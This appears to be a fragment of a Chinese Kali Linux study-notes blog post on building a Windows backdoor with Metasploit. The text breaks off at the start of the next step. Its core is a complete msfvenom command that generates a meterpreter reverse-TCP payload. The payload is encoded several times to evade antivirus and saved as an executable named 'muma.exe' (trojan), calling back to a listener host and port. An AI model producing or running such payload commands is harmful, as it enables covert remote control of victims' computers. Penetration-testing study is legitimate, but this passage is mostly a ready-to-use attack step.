kali的学习笔记篇(七)metasploit之PC后门

更新时间:2018年8月13日07:06:14web //生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块 use explo
相关文章
相关标签/搜索